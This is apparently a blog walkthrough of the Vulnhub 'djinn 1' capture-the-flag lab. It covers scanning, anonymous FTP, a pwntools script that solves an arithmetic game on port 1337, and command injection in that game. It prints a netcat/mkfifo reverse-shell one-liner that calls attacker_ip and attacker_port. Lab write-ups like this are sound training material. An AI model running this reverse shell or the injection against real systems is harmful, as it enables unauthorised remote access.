Vulnhub djinn 1 — Walkthrough

Recon with Nmap:

Port Scan with Nmap
Access anonymous FTP using Filezilla
Content of files located in FTP server
Game hosted on port 1337

from pwn import *

conn = remote(‘192.168.0.102’,1337)

conn.recvuntil(“\n\n”, drop=True)

for i in range(1001):
conn.recvuntil(“(”, drop=True)
first = conn.recvuntil(“,”, drop=True)
conn.recvuntil(“‘“, drop=True)
arith = conn.recvuntil(“‘“, drop=True)
conn.recvuntil(“, “, drop=True)
last = conn.recvuntil(“)”, drop=True)
final = first+arith+last
print str(i)+”th answer= “+final
conn.sendlineafter(‘>’,final)

conn.interactive()

That scripts solves the game that hosted on 1337 port.

Gift after solving the game
Port knocking on given three ports open SSH

Tried with given creds but failed to SSH.

There is another way that is called python command injection:

Command Injection in Game on 1337

now time to get reverse shell. I found the netcat installed within the victim is not having backdoor functionality so I used another one liner rev shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker_ip attacker_port>/tmp/f
Got Rev Shell and found 2 flags

Thanks to:

Ananda Chaudhury

Anutosh Roy

for your awesome contributions.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade